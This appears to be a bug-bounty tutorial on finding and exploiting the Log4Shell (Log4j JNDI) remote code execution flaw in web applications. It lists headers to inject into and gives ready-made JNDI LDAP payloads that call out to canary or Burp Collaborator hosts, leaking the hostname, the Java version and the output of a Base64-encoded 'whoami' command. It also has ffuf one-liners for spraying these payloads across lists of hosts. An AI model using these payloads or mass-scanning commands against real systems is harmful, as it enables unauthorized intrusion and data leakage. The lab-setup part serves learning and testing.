Yes I know, everybody want's to wash their hands in this flood. So I will share some tricks to find log4j RCE on vulnerable Web applications.
What is Log4j?
Log4j is a popular Java logging library which is used by many of Java applications available on the internet. For more details, read this.
Where you can find this?
Any application which is using java and log4j library can be exploited. So you have to find any input field which is logged in application. These are the few key areas to look for :-
User-Agent
X-Requested-For
X-Requested-With
Authentication-Bearer
X-Api-VersionFor learning purpose
You can host a vulnerable application on your system to learn how to exploit it.
Requirements:-
Use this command to run vulnerable application
sudo docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-appGenerate Canarytokens or you can use your burp collaborater for this.
Select DNS token -> Enter your email -> Write anything in reminder.
Steps to exploit:-
Open vulnerable app in Burpsuite repeater
Add this header with your canary token payload `X-Api-Version: ${jndi:ldap://yourtoken.canarytokens.com/a} `
Check your mail
For impact try these payloads:-
${jndi:ldap://x${hostName}.L4J.yourtoken.canarytokens.com/a}
${jndi:ldap://${hostName}.ยงยง.${sys:java.version}.yourtoken.burpcollaborator.net}
${jndi:ldap://dm3v6xcr9b9d0gkcut2rd0s84zaqyf.burpcollaborator.net/Basic/Command/Base64/cGluZyBgd2hvYW1pYC5kbTN2NnhjcjliOWQwZ2tjdXQycmQwczg0emFxeWYuYnVycGNvbGxhYm9yYXRvci5uZXQ=}
For Automations
There are many tools available on Github for scanning this CVE. These are some of the best:-
Log4shell-scanner - Practical video is also posted
ffuf commands:-
~/go/bin/ffuf -w "$1"/dirs.txt -u FUZZ -H 'User-agent: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Api-Version: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Requested-For: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Requested-With: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'Authentication-Bearer: ${jndi:ldap://yourtoken.canarytokens.com/a}'
ffuf -w httpx.txt -u FUZZ -H "HEADERS: ${jndi:ldap://test.burpcollab.com/a}" -w lowercase-headers:HEADERSIf you have an application with many features, then manual approach is best for finding this.